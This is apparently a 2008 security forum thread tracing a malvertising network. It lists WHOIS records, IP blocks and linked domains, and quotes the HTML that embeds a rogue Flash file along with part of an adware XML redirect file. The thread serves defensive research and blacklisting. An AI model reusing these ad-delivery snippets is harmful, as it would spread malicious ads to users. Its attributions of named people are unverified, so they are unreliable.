%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Information related to '85.17.4.0 - 85.17.4.255'

inetnum: 85.17.4.0 - 85.17.4.255
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: www.leaseweb.com
remarks: Please send email to "abuse@leaseweb.com" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
status: ASSIGNED PA
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050320
changed: ripe@ocom.com 20060608
source: RIPE

person: RIP Mean
address: P.O. Box 93054
address: 1090BB AMSTERDAM
address: Netherlands
phone: +31 20 3162880
fax-no: +31 20 3162890
abuse-mailbox: abuse@leaseweb.com
e-mail: ripe@ocom.com
nic-hdl: LSW1-RIPE
notify: ripe@ocom.com
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050607
changed: ripe@ocom.com 20060215
changed: ripe@ocom.com 20060608
source: RIPE

% Information related to '85.17.0.0/16AS16265'

route: 85.17.0.0/16
descr: LEASEWEB
origin: AS16265
remarks: LeaseWeb
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050311
changed: ripe@ocom.com 20070610
source: RIPE
______________________________

Failed to resolve hostname.

adtraff.com
burnads.com
netmediagroup.net
uniqads.com
traveltray.com
aheadad.com
______________________________

Update 9 Feb. 2008

They are up again, except aheadad.com

adtraff.com - 84.243.252.84
burnads.com - 84.243.252.85
netmediagroup.net - 84.243.252.91
uniqads.com - 84.243.252.97

traveltray - 194.110.67.23
Kimberly
<h4>
190.15.64.187 - ? - GET /swf/gnida.swf = ok
</h4>
Finally got a name for that IP.

entrerrenglonadura.com - 190.15.64.187

IP Location - Francisco Morazan - Tegucigalpa - Secure Hosting Ltd
Created: 2007-11-23
Expires: 2008-11-23
Name Server: NS1.ENTRERRENGLONADURA.COM
Name Server: NS2.ENTRERRENGLONADURA.COM

Error Message
There was an error processing your request.

Domain Name : entrerrenglonadura.com

::Registrant::
Name : Entrerrenglonadura
Email : mail(at)entrerrenglonadura.com
Address : Pix str 12 Jordan
Zipcode : 1252
Nation : EC
Tel : 4858455
Fax :

::Administrative Contact::
Name : Entrerrenglonadura
Email : mail(at)entrerrenglonadura.com
Address : Pix str 12 Jordan
Zipcode : 1252
Nation : EC
Tel : 4858455
Fax :

::Technical Contact::
Name : Entrerrenglonadura
Email : mail(at)entrerrenglonadura.com
Address : Pix str 12 Jordan
Zipcode : 1252
Nation : EC
Tel : 4858455
Fax :

::Name Servers::
ns1.entrerrenglonadura.com
ns2.entrerrenglonadura.com
ns3.entrerrenglonadura.com
ns4.entrerrenglonadura.com

::Dates & Status::
Created Date 2007-11-23 05:03:25 EST
Updated Date 2007-11-23 05:03:25 EST
Valid Date 2008-11-23 05:03:25 EST
Status ACTIVE

<h4>
human500.com - 71.18.200.75
</h4>
Another domain came out of the box while doing some research today.

human500.com/bin/tremor/statsg.php

Not the usual folder but let's take a peek at the statsg.php file anyway. Interesting stuff ... we do find our gnida.swf back. So that's another one to blacklist.

CODE
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title></title>
</head>
<body bgcolor="#ffffff">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="200" height="200" id="gnida" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
<param name="movie" value="swf/gnida.swf" />
<param name="menu" value="false" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<embed src="swf/gnida.swf" menu="false" quality="high" bgcolor="#ffffff" width="200" height="200" name="gnida" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />
</object>
</body>
</html>

Website Title: Human500 Project
ICANN Registrar: GODADDY.COM, INC.
Name Server: NS5.IXWEBHOSTING.COM
Name Server: NS6.IXWEBHOSTING.COM
Whois Server: whois.godaddy.com

Server Type: Apache
IP Location - Kentucky - Hopkinsville - Ecommerce Corporation
Created: 2006-08-29
Expires: 2008-08-29
Registrar Status: clientDeleteProhibited
Registrar Status: clientRenewProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited

Whois Record
Registrant:
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: HUMAN500.COM
Created on: 29-Aug-06
Expires on: 30-Aug-08
Last Updated on: 04-Sep-06

Administrative Contact:
Private, Registration
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
(480) 624-2599 Fax -- (480) 624-2599

Technical Contact:
Private, Registration
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
(480) 624-2599 Fax -- (480) 624-2599

Domain servers in listed order:
NS5.IXWEBHOSTING.COM
NS6.IXWEBHOSTING.COM

Related domains and mailservers

<h4>
Extra reading
</h4>
Inside Rogue Flash Ads, by Dennis Elser and Micha Pekrul, Secure Computing Corporation.
Kimberly
Every day new banners and / or websites show up, we all need your help.

<h4>
iexplorer-security.org - 84.252.148.219
</h4>
Server Type: gws
IP Location - Russian Federation - Mc Host.ru
Created: 2008-01-12
Expires: 2010-01-12
Whois Server: whois.pir.org
Dedicated Hosting: iexplorer-security.org is hosted on a dedicated server.

Domain ID:D150624483-LROR
Domain Name:IEXPLORER-SECURITY.ORG
Created On:12-Jan-2008 14:16:26 UTC
Last Updated On:15-Jan-2008 10:31:03 UTC
Expiration Date:12-Jan-2010 14:16:26 UTC
Sponsoring Registrar:EstDomains, Inc. (R1345-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:P.O. Box 97
Registrant Street2:All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:

Name Server:MANAGEDNS1.ESTBOXES.COM
Name Server:MANAGEDNS2.ESTBOXES.COM
Name Server:MANAGEDNS3.ESTBOXES.COM
Name Server:MANAGEDNS4.ESTBOXES.COM

domains sharing nameservers.
  • 1vipstar.com
  • 2007postcards.com
  • abalmasov.com
  • absolute-space.net
  • actualbandwidth.net
  • albanino.com
  • anetwork.net
  • anothercoolpoint.net
  • antispygolden.com
  • archhistory.net
  • auto-zapchasti.com
  • awmutils.com
  • beloni.net
  • best4all.net
  • blindsearch.net
  • bodyresearch.net
  • carding666.com
  • central-office.net
  • classicmotiontheory.net
  • classicphyschapter.net
  • coherentsource.net
  • compromat.net
  • dolanare.com
  • egi-service.com
  • electricalimput.net
  • estexpired.com
  • estparking.com
  • fafind.com
  • fastmediaservice.com
  • fetisches.com
  • for-movies.net
  • funzor.net
  • garybrolsma.net
  • gayshunks.com
  • goldcoders.com
  • googlerankigs.com
  • hiramaxthumbs.com
  • hirosh.net
  • hitvirus.com
  • htraf.com
  • i-wns.com
  • joindreams.com
  • kar-textiles.com
  • klikfeed.com
  • klikrevenue.com
  • kompromat.net
  • kytoon.com
  • laser-modules.net
  • loguestbook.ws
  • lost-civilizations.net
  • loventity.com
  • lowbandwidth.net
  • lowscaleworld.net
  • malwareburn.com
  • miyana.org
  • modernworldview.net
  • mp3-planet.net
  • mpagii.org
  • negativenumber.net
  • nelroyltd.com
  • newmediadriver.com
  • newtonrealtime.net
  • nfodb.com
  • nfodb.org
  • nude-art.net
  • ofigeno.net
  • onlineheavytheory.net
  • opticalassemblies.net
  • paydir.com
  • peacedata.biz
  • pentarh.com
  • photonsstream.net
  • procodec.com
  • prozvon.info
  • rape-tgp.net
  • resurrect.net
  • sanek.info
  • slizen.com
  • softservice.us
  • spycut.com
  • spyhazard.com
  • stinger911.net
  • sunnysex.net
  • surfermail.net
  • synchrotronsbasic.net
  • ultralightbeam.net
  • vacuum-energy.net
  • vanix.net
  • videoforsex.com
  • videohook.com
  • virusheal.com
  • virusranger.com
  • wellcams.biz
  • wellcams.com
  • wz-mail.net
  • xl2.net
  • xpldev.net
  • xxl-cash.com
  • yeahsearch.net
  • zloy.net
  • zolotonio.com
  • zxc.net.ua
(only showing 100 results)

<h4>
adtds2.promoplexer.com - 217.20.175.74
</h4>
Domain Name: PROMOPLEXER.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Name Server: NS1.VICI.UA
Name Server: NS2.VICI.UA
Status: ok
Updated Date: 04-jan-2008
Creation Date: 05-nov-2007
Expiration Date: 05-nov-2008

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: http://www.estdomains.com

Domain Name: PROMOPLEXER.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Websites.
  1. Macsweeper.com
hostnames sharing ip with a-records.
  • macsweeper.com
  • ns1.cleanator.com
  • ns1.macsweeper.com
  • www.macsweeper.com
hostnames beginning with adtds2.
  • adtds2.maxconvert.com
domains using this as nameserver.
  • cleanator.com
  • macsweeper.com
<h4>
Promoplexer.com - 217.20.175.39
</h4>
Server Type: Apache/2.0.55 (Ubuntu) PHP/5.1.6
IP Address: 217.20.175.39
IP Location - Kyyiv - Kiev - W Net Isp
Created: 2007-11-05
Expires: 2008-11-05
Whois Server: whois.estdomains.com

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217

Domain Name: PROMOPLEXER.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Creation Date: 05-Nov-2007
Expiration Date: 05-Nov-2008

Domain servers in listed order:
ns2.vici.ua
ns1.vici.ua

MX alt1.aspmx.l.google.com
64.233.167.27 gsmtp167.google.com
64.233.167.114 gsmtp167-2.google.com

MX alt2.aspmx.l.google.com
209.85.133.27 an-in-f27.google.com
209.85.133.114 an-in-f114.google.com

MX aspmx.l.google.com
66.249.93.27 gsmtp93.google.com
66.249.93.114 gsmtp93-2.google.com

Websites.
  1. Maxconvert.com
  2. Promoplexer.com
hostnames sharing ip with a-records.
  • maxconvert.com
  • usin-39.colo2.kv.wnet.ua
domains sharing mailservers.
  • 27kb.se
  • 27kilobyte.se
  • 2friend.com
  • 2hc.org
  • aanetwork.net
  • aaronfitz.info
  • abadox.biz
  • access9.net
  • adaeuro.com
  • admugio.com
  • akanea.com
  • alikadic.com
  • alisaglam.com
  • alpha-lab.net
  • altafandaltaf.com
  • annie-and-rob.com
  • applinet.com.ar
  • araos.cl
  • atleticano.com
  • backwardslogic.com
  • bertelson.us
  • bhtele.com
  • bigfang.com
  • bios-sport.com
  • black-panther.us
  • bodyextreme.com
  • bouallou.com
  • caeluspartners.com
  • cainelli.com.ar
  • calebchen.com
  • catalystic.net
  • cetin.org
  • chadcwaters.com
  • chaisong.com
  • chrisk.com
  • cintriq.com
  • cintron.org
  • claman.net
  • clsrock.com
  • codycrew.com
  • coimbatorian.com
  • complementar.net
  • consys.net
  • copteaser.com
  • corrientesaldia.com.ar
  • cowmoo.net
  • creamedhoney.com
  • cynicalgeeks.com
  • deathbylogic.com
  • decoma.com.au
  • dixonz.com
  • drbullock.com
  • droegemueller.net
  • durabull.co.uk
  • duran.org.ar
  • echiu.com
  • edgarfamily.net
  • ehven.com
  • elizabethsinteriors.com
  • elliott.uk.com
  • empathy.net
  • enhanceit.com.au
  • enthrone.net
  • etzich.net
  • evilcode.com
  • evylle.com
  • fazisse.com
  • fedro.com
  • feuer.ca
  • fought.net
  • fragzone.se
  • fremonianindustries.com
  • fupot.com
  • fz.se
  • galo.net
  • geenstijl.nl
  • globalconvergence.net
  • goldenidol.net
  • gsesoft.com
  • hackers.net.ua
  • hakaveret.co.il
  • halladaytrees.com
  • hanareha.com
  • hangglide.com.au
  • hassall.id.au
  • hireright.us
  • homiez.net
  • horstmeier.org
  • housingcounseling.net
  • ictoan.net
  • ifesgulf.com
  • immutable.org
  • inner-circle.org
  • iridia.nl
  • irken.net
  • jamclam.us
  • jclayconstruction.com
  • jeffsmall.com
  • joshua.net
  • juntera.com
  • justasisuspected.com
  • kathymike.com
(only showing 100 results)

domains sharing nameservers.
  • adsraise.com
  • clenator.com
  • kivvisoftware.com
  • maxconvert.com
subdomains.
  • *.promoplexer.com
  • adtds2.promoplexer.com
Kimberly
As mentioned by Sandi, a couple of new banners have caught our eye. We notice a change in the URL’s of the redirects.

Before.

[domain]/statsa.php?u=[date/time stamp]&campaign=[campaign name]

Example:
  • quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni
Now.

[domain]/c/index.php?id=[encrypted string]

Examples:
  • station-appraisals.com/c/index.php?id=WjM0VnExOHBjeDMza0dEUDdnUGRoPTEyMDI4MjE3MjYmcG56Y252dGE9dnFyYWd2c2xmYgYNkiDgNmYNkiDgNm

    IPB Image
  • staticglobalsources.net/c/index.php?id=m7NkiZnRhRDh6RVRudHpXm7NkiZHJsm7NkiZFUwVEloPTEyMDQwNDcyMzImcG56Y252dGE9bmV0aHpyYWdim7NkiZQYNkiDgNmYNkiDgNm

    IPB Image
Let's take the 2 lastcomers apart since they reveal some new domains.
  1. station-appraisals.com/c/index.php?id=WjM0VnExOHBjeDMza0dEUDdnUGRoPTEyMDI4MjE3MjYmcG56Y252dGE9dnFyYWd2c2xmYgYNkiDgNmYNkiDgNm
    blessedads.com/?cmpid=identifyso
    antivirusforall.com/?tmn=av5&gai=identifyso&gli=&3&mt_info=5586_5581_4577

  2. staticglobalsources.net/c/index.php?id=m7NkiZnRhRDh6RVRudHpXm7NkiZHJsm7NkiZFUwVEloPTEyMDQwNDcyMzImcG56Y252dGE9bmV0aHpyYWdim7NkiZQYNkiDgNmYNkiDgNm
    waytotheprofit.com/?cmpid=argumentor
New domains.
  1. station-appraisals.com
  2. staticglobalsources.net
  3. waytotheprofit.com
<h4>
waytotheprofit.com - 76.74.249.30
</h4>
It's very easy to link this domain to the other players. We notice that blessedads.com and prevedmarketing.com share the same IP with waytotheprofit.com. Colored in orange, domains which did share nameservers with newbieadguide.com (post #4 - Closest Relationships). As a matter of fact, all were hosted on 190.15.73.254 at that time except deuspayment.com.

Websites.
  1. Ad2cash.net
  2. Ad2profit.com
  3. Adcomatoz.com
  4. Adgurman.com
  5. Adnetserver.com
  6. Adredired.com
  7. Adsolutio.com
  8. Adverdaemon.com
  9. Adverlounge.com
  10. Adzyclon.com
  11. Astalaprofit.com
  12. B2adz.com
  13. Bizadverts.com
  14. Bizmarketads.com
  15. Blessedads.com
  16. Brandmarketads.com
  17. Bucksbill.com
  18. Deuspayment.com
  19. Friedads.com
  20. Glorymarkets.com
  21. Iddqdmarketing.com
  22. Intervarioclick.com
  23. Invulnerableads.com
  24. Luckyadcoin.com
  25. Luckyadsols.com
  26. Moneycometrue.com
  27. Mythmarketing.com
  28. Popadprovider.com
  29. Prevedmarketing.com
  30. Rocktheads.com
  31. Sharpadverts.com
  32. Shivanetworking.com
  33. Waytotheprofit.com
Domain Name: WAYTOTHEPROFIT.COM
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.WAYTOTHEPROFIT.COM
Name Server: NS2.WAYTOTHEPROFIT.COM
Status: ok
Updated Date: 03-mar-2008
Creation Date: 02-jul-2007
Expiration Date: 02-jul-2009

Domain : waytotheprofit.com

Registrant Contact Information :
Hostmaster Inc.
Schoolstraat 214
Wambeek, Wambeek 1741
no_name_inc(at)yahoo.com
BE

Admin Contact Information :
Donna V. Reed, Donna no_name_inc(at)yahoo.com
Schoolstraat 214
Wambeek, Wambeek 1741
no_name_inc(at)yahoo.com
BE
1-555-555-1234

Tech Contact Information :
Donna V. Reed, Donna no_name_inc(at)yahoo.com
Schoolstraat 214
Wambeek, Wambeek 1741
no_name_inc(at)yahoo.com
BE
1-555-555-1234

Billing Contact Information :
Contact is identical to Admin

Name Server: NS2.WAYTOTHEPROFIT.COM - 76.74.249.28
Name Server: NS1.WAYTOTHEPROFIT.COM - 76.74.249.29

hostnames sharing ip with a-records & domains sharing nameservers.
  • ad2profit.com
  • adgurman.com
  • adredired.com
  • adsolutio.com
  • astalaprofit.com
  • bizmarketads.com
  • brandmarketads.com
  • iddqdmarketing.com
  • intervarioclick.com
  • invulnerableads.com
  • luckyadcoin.com
  • luckyadsols.com
  • mythmarketing.com
subdomains.
  • *.waytotheprofit.com
  • mail.waytotheprofit.com
  • ns1.waytotheprofit.com
  • ns2.waytotheprofit.com
QUOTE
Queried whois.arin.net with "!NET-76-74-248-0-1"...

OrgName: ServerBeach
OrgID: SERVER-17
Address: 8500 Vicar Drive 8500, Suite 500
City: San Antonio
StateProv: TX
PostalCode: 78218
Country: US

NetRange: 76.74.248.0 - 76.74.255.255
CIDR: 76.74.248.0/21
NetName: PEER1-SERVERBEACH-08A
NetHandle: NET-76-74-248-0-1
Parent: NET-76-74-128-0-1
NetType: Reallocated
NameServer: NS1.SERVERBEACH.COM
NameServer: NS2.SERVERBEACH.COM
Comment:
RegDate: 2007-12-05
Updated: 2007-12-05

RTechHandle: HOSTM325-ARIN
RTechName: Hostmaster
RTechPhone: +1-210-225-4725
RTechEmail: hostmaster(at)serverbeach.com

OrgAbuseHandle: SNAE-ARIN
OrgAbuseName: Serverbeach Network AUP Enforcement
OrgAbusePhone: +1-604-484-2588
OrgAbuseEmail: abuse(at)serverbeach.com

OrgTechHandle: ZZ4092-ARIN
OrgTechName: ipadmin
OrgTechPhone: +1-210-225-4725
OrgTechEmail: ipadmin(at)serverbeach.com

# ARIN WHOIS database, last updated 2008-03-11 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

ServerBeach ....

<h4>
station-appraisals.com - 81.93.56.86
</h4>
Looking at the shared nameservers, it's easy to link station-appraisals.com to the other actors.

Domain Name: STATION-APPRAISALS.COM
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.STATION-APPRAISALS.COM
Name Server: NS2.STATION-APPRAISALS.COM
Status: ok
Updated Date: 04-feb-2008
Creation Date: 01-feb-2008
Expiration Date: 01-feb-2009

Domain : station-appraisals.com

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

Admin Contact Information :
Contact is identical to Registrant

Tech Contact Information :
Contact is identical to Admin

Billing Contact Information :
Contact is identical to Admin

NS1.STATION-APPRAISALS.COM - 202.75.35.72
NS2.STATION-APPRAISALS.COM - 58.65.238.170

hostnames beginning with station-appraisals.
  • station-appraisals.net
domains sharing nameservers.
  • aboutstat.com
  • akamahi.net
  • entrerrenglonadura.com
  • newstat.net
  • officialstat.com
  • quinquecahue.com
  • stat-diagnostic-imaging.net
  • stathisranch.net
  • staticglobalsources.com
  • station-appraisals.net
  • statnation.net
  • thetechnorati.com
  • vozemiliogaranon.com
subdomains.
  • *.station-appraisals.com
  • ns1.station-appraisals.com
  • ns2.station-appraisals.com
station-appraisals.net - 81.93.56.87
ns1.station-appraisals.net - 202.75.35.72
ns2.station-appraisals.net - 58.65.238.170

<h4>
staticglobalsources.net - 81.93.56.85
</h4>
Domain Name: STATICGLOBALSOURCES.NET
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.STATICGLOBALSOURCES.NET
Name Server: NS2.STATICGLOBALSOURCES.NET
Status: ok
Updated Date: 04-feb-2008
Creation Date: 01-feb-2008
Expiration Date: 01-feb-2009

Domain : staticglobalsources.net

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

Admin Contact Information :
Contact is identical to Registrant

Tech Contact Information :
Contact is identical to Admin

Billing Contact Information :
Contact is identical to Admin

Name Server: NS1.STATICGLOBALSOURCES.NET - 202.75.35.72
Name Server: NS2.STATICGLOBALSOURCES.NET - 58.65.238.170

hostnames beginning with staticglobalsources.
  • staticglobalsources.com
domains sharing nameservers
  • aboutstat.com
  • akamahi.net
  • entrerrenglonadura.com
  • newstat.net
  • officialstat.com
  • quinquecahue.com
  • stat-diagnostic-imaging.net
  • stathisranch.net
  • station-appraisals.com
  • station-appraisals.net
  • statnation.net
  • thetechnorati.com
  • vozemiliogaranon.com
subdomains.
  • *.staticglobalsources.net
  • ns1.staticglobalsources.net
  • ns2.staticglobalsources.net
staticglobalsources.com - 81.93.56.84
ns1.staticglobalsources.com - 202.75.35.72
ns1.staticglobalsources.com - 202.75.35.72

<h4>
checking c-net 81.93.56.*
</h4>
81.93.56.72 aboutstat.com A
81.93.56.74 newstat.net A
81.93.56.75 officialstat.com A
81.93.56.78 stat-diagnostic-imaging.net A
81.93.56.82 stathisranch.net A
81.93.56.84 staticglobalsources.com A
81.93.56.85 staticglobalsources.net A
81.93.56.86 station-appraisals.com A
81.93.56.87 station-appraisals.net A
81.93.56.88 statnation.net A
81.93.56.91 statsla.net A
81.93.56.98 mail.mailindustries.eu PTR A - mailindustries.eu A

Why am I not surprised that all those domains except 81.93.56.98 belong to Serg Moon?

DomainTools reveals us the following info :

"Serg Moon" owns about 19 other domains
moon.serg@gmail.com is associated with about 28 domains
Something I learned a long time ago .... "poke around" in the closest ranges. cool.gif

checking c-net 81.93.55.*

One did catch my eye in that block because it's hosted on a nginx/0.4.13 server.

81.93.55.178 - statworld.net

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

81.93.55.176-81.93.55.183 NL-CUST-DENIT-ID-11372 Denit NL Customer with ID 11372

So I think it's safe to presume that all those IP's belong to Serg Moon also. They will have my full attention in the next days.

<h4>
Denit Internet Services
</h4>
% Information related to '81.93.48.0 - 81.93.63.255'

inetnum: 81.93.48.0 - 81.93.63.255
org: ORG-DIS2-RIPE
admin-c: DIT8723-RIPE
netname: NL-DENIT-20060508
descr: Denit Internet Services
country: NL
tech-c: DIT8723-RIPE
status: ALLOCATED PA
notify: ripe@denit.nl
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: DENIT-IS-MNT
mnt-routes: DENIT-IS-MNT
changed: hostmaster@ripe.net 20060508
changed: bitbucket@ripe.net 20080125
source: RIPE

organisation: ORG-DIS2-RIPE
org-name: Denit Internet Services
org-type: LIR
address: Denit Internet Services B.V.
Contactweg 131
1014 BJ Amsterdam
NETHERLANDS
phone: +31 20 3372560
fax-no: +31 20 3371802
e-mail: ripe@denit.nl
admin-c: EVER1-RIPE
admin-c: SIMO-RIPE
mnt-ref: DENIT-IS-MNT
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
changed: hostmaster@ripe.net 20040415
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060508
changed: bitbucket@ripe.net 20070316
changed: bitbucket@ripe.net 20070813
changed: bitbucket@ripe.net 20080125
changed: bitbucket@ripe.net 20080125
source: RIPE

role: DenIT RIPE maintainer role
address: Denit Internet Services BV
address: Contactweg 131
address: 1014 BJ Amsterdam
address: The Netherlands
e-mail: ripe@denit.net
phone: +31 20 3371801
fax-no: +31 20 3371802
notify: ripe@denit.net
admin-c: SIMO-RIPE
tech-c: SIMO-RIPE
nic-hdl: DIT8723-RIPE
mnt-by: DENIT-IS-MNT
remarks: ------------------------------------------
remarks: Send abuse reports to: abuse@denit.net
remarks: Send security reports to: beheer@denit.net
remarks: All other mail to: info@denit.net
remarks: ------------------------------------------
changed: ripe@denit.net 20030103
changed: ripe@denit.net 20031007
source: RIPE

% Information related to '81.93.48.0/20AS25542'

route: 81.93.48.0/20
descr: Denit Networks
origin: AS25542
mnt-by: DENIT-IS-MNT
changed: jsimonetti@denit.net 20070525
source: RIPE
______________________________

Well, right now I need more time to check out all the information found today, fill out the gaps if possible and I still need to check a couple of IP ranges so I will post back if anything new shows up.
Kimberly
Remember I started with this ...

81.93.56.72 aboutstat.com A
81.93.56.74 newstat.net A
81.93.56.75 officialstat.com A
81.93.56.78 stat-diagnostic-imaging.net A
81.93.56.82 stathisranch.net A
81.93.56.84 staticglobalsources.com A
81.93.56.85 staticglobalsources.net A
81.93.56.86 station-appraisals.com A
81.93.56.87 station-appraisals.net A
81.93.56.88 statnation.net A
81.93.56.91 statsla.net A
Reflex - If you see *.com & *.net mixed, look for their vise versa.

81.93.56.73 - aboutstat.net
81.93.56.76 - officialstat.net
81.93.56.77 - stat-diagnostic-imaging.com
81.93.56.81 - stathisranch.com
Doh, bad luck for newstat.com, statnation.com and statsla.com Mr. Moon, they are already taken.

Let's fix the IP block overview first ....

81.93.56.72 aboutstat.com
81.93.56.73 aboutstat.net
81.93.56.74 newstat.net
81.93.56.75 officialstat.com
81.93.56.76 officialstat.net
81.93.56.77 stat-diagnostic-imaging.com
81.93.56.78 stat-diagnostic-imaging.net
81.93.56.79 ?
81.93.56.80 ?
81.93.56.81 stathisranch.com
81.93.56.82 stathisranch.net
81.93.56.83 ?
81.93.56.84 staticglobalsources.com
81.93.56.85 staticglobalsources.net
81.93.56.86 station-appraisals.com
81.93.56.87 station-appraisals.net
81.93.56.88 statnation.net
81.93.56.89 ?
81.93.56.90 ?
81.93.56.91 statsla.net
5 IP's left, 5 gaps to fill. wink.gif

Stay tuned ... it's not gonna take me long to digg up the remaining stuff if possible.
Kimberly
Let's examine important info (outlined in red below).

Domain Name: STATION-APPRAISALS.COM
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.STATION-APPRAISALS.COM
Name Server: NS2.STATION-APPRAISALS.COM
Status: ok
Updated Date: 04-feb-2008
Creation Date: 01-feb-2008
Expiration Date: 01-feb-2009
There were 25 new domains for COMMUNIGAL.NET on 02/01/2008
  1. ABOUTSTAT.COM
  2. ABOUTSTAT.NET
  3. NEWSTAT.NET
  4. NIMOONLINE.COM
  5. NIMOONLINE.NET
  6. NIMOREX.COM
  7. NIMOREX.NET
  8. OFFICIALSTAT.COM
  9. OFFICIALSTAT.NET
  10. STAT-DIAGNOSTIC-IMAGING.COM
  11. STAT-DIAGNOSTIC-IMAGING.NET
  12. STATETSTR.COM
  13. STATGROUP.NET
  14. STATHISRANCH.COM
  15. STATHISRANCH.NET
  16. STATHOME.NET
  17. STATICGLOBALSOURCES.COM
  18. STATICGLOBALSOURCES.NET
  19. STATION-APPRAISALS.COM
  20. STATION-APPRAISALS.NET
  21. STATNATION.NET
  22. STATSITE.NET
  23. STATSLA.NET
  24. STATUAS.NET
  25. STATWORLD.NET
IPB Image

Which gives us the following additional domains beloging to Serge Moon.
  • 81.93.56.79 statetstr.com
  • 81.93.56.80 statgroup.net
  • 81.93.56.83 stathome.net
  • 81.93.56.88 statsite.net
  • 81.93.56.92 statuas.net
Overview.
  1. 81.93.56.72 aboutstat.com
  2. 81.93.56.73 aboutstat.net
  3. 81.93.56.74 newstat.net
  4. 81.93.56.75 officialstat.com
  5. 81.93.56.76 officialstat.net
  6. 81.93.56.77 stat-diagnostic-imaging.com
  7. 81.93.56.78 stat-diagnostic-imaging.net
  8. 81.93.56.79 statetstr.com
  9. 81.93.56.80 statgroup.net
  10. 81.93.56.81 stathisranch.com
  11. 81.93.56.82 stathisranch.net
  12. 81.93.56.83 stathome.net
  13. 81.93.56.84 staticglobalsources.com
  14. 81.93.56.85 staticglobalsources.net
  15. 81.93.56.86 station-appraisals.com
  16. 81.93.56.87 station-appraisals.net
  17. 81.93.56.88 statnation.net
  18. 81.93.56.88 statsite.net
  19. 81.93.56.91 statsla.net
  20. 81.93.56.92 statuas.net
  21. 81.93.55.178 statworld.net
"Serg Moon" owns about 19 other domains.... wink.gif

Remaining.
  • 81.93.56.89 ?
  • 81.93.56.90 ?
To keep an eye on.
  • 81.93.55.176
  • 81.93.55.177
  • 81.93.55.179
  • 81.93.55.180
  • 81.93.55.181
  • 81.93.55.182
  • 81.93.55.183
moon.serg@gmail.com is associated with about 28 domains.... wink.gif
Kimberly
Ready for another journey in advert land ?

Yesterday evening Malekal_morte did ask me if I knew what was creating xml files on a victims computer. In meanwhile he grabbed a copy of an xml file. Kudos for doing that.

My curiosity immediately got picked after seeing the following:

CODE
<frameset>
<frame src="http://luckyadsols.com/?rotationid=start404&gai=4043&gli={URL}&gff=4042&uid={UID}&guid={GUID}&aid={AID}">
</frameset>

luckyadsols.com shares the same IP as waytotheprofit.com, blessedads.com, prevedmarketing.com as seen earlier.
Other interesting elements present in the xml file are:
  • CAMPAIGN name=[name] id=[number] - there are 4 of them
  • 83.149.105.113
  • 91.184.6.104
  • pagead2\.googlesyndication\.com
  • ahahoo.com
Full code below, I just did scrable the encrypted IP. A screenshot is available here because the code is easier to follow.

CODE
- <ROOT>
- <CAMPAIGNLIST>
- <CAMPAIGN name="lsd-89" id="1224201">
- <actions>
- <action type="Request">
- <newvalue>
